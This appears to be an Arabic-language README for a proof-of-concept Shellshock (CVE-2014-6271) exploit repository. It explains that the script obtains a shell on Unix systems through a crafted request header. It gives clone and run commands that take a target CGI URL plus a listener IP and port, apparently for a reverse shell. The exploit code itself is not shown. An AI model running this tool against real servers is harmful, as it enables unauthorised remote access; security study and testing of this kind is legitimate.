
استغلال صدمة الصدفة (CVE-2014-6271)
يحتوي هذا المستودع على استغلال لثغرة تؤثر على الأنظمة القائمة على يونكس. يرجى ملاحظة أن هذا مجرد نص برمجي لإثبات المفهوم تم إنشاؤه لأغراض تعليمية ويجب استخدامه بمسؤولية.
تم تصميم هذا الاستغلال لإظهار كيفية عمل هجوم شل شوك وكيف يمكن استخدامه للحصول على وصول شل إلى النظام من خلال رأس طلب تم إنشاؤه بشكل خبيث.
هذا المستودع مخصص للأغراض التعليمية فقط. لا تستخدم هذا الرمز أو أي معلومات واردة فيه لأغراض ضارة. اتبع دائمًا الإرشادات الأخلاقية واحترم القانون.
الاستخدام:
python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]
مثال:
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
المتطلبات الأساسية:
استنسخ هذا المستودع إلى جهازك المحلي.
git clone https://github.com/AlissonFaoli/Shellshock.git
انتقل إلى دليل المشروع.
cd Shellshock
قم بتشغيل نص shellshock.py.
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
تم إصدار هذا الاستغلال بموجب ترخيص MIT. يمكنك العثور على مزيد من المعلومات حول هذا في ملف LICENSE.
إذا كانت لديك أي أسئلة أو استفسارات حول هذا الاستغلال، فلا تتردد في الاتصال بالمؤلف